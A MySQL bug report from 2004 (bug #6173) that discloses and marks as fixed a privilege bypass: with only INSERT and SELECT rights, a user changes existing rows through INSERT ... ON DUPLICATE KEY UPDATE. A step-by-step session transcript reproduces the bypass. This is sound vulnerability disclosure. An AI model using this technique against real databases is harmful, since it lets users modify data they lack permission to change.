Bug #6173 One can circumvent missing UPDATE privileges if he has INSERT + SELECT privs
Submitted: 20 Oct 2004 9:32 Modified: 20 Oct 2004 13:44
Reporter: Dmitry Lenev Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Server Severity:S2 (Serious)
Version:4.1 OS:
Assigned to: Dmitry Lenev

[20 Oct 2004 9:32] Dmitry Lenev
Description:
One can circumvent missing UPDATE privilege if he has INSERT and SELECT privileges for table with primary key.

How to repeat:
mysql> show grants for current_user();
+------------------------------------------------------------+
| Grants for mrbad@localhost                                 |
+------------------------------------------------------------+
| GRANT SELECT, INSERT, CREATE ON *.* TO 'mrbad'@'localhost' |
+------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> create table test_upd (id int primary key, data varchar(255));
Query OK, 0 rows affected (0.01 sec)

mysql> insert into test_upd values (1,'I can''t change it!');
Query OK, 1 row affected (0.02 sec)

mysql> update test_upd set data='I can change it!' where id = 1;
ERROR 1142 (42000): update command denied to user 'mrbad'@'localhost' for
table 'test_upd'
mysql> insert into test_upd values (1,'Some trash') on duplicate key
update data='I can change it!';
Query OK, 2 rows affected (0.00 sec)

mysql> select * from test_upd;
+----+------------------+
| id | data             |
+----+------------------+
|  1 | I can change it! |
+----+------------------+
1 row in set (0.03 sec)

mysql>
[20 Oct 2004 13:44] Dmitry Lenev
Thank you for your bug report. This issue has been committed to our
source repository of that product and will be incorporated into the
next release.

If necessary, you can access the source repository and build the latest
available version, including the bugfix, yourself. More information 
about accessing the source trees is available at
    http://www.mysql.com/doc/en/Installing_source_tree.html

Additional info:

ChangeSet 1.2042.47.1 2004/10/20 16:04:43 dlenev@brandersnatch.localdomain
  Fix for bug #6173 "One can circumvent missing UPDATE privilege if
  he has SELECT and INSERT privileges for table with primary key"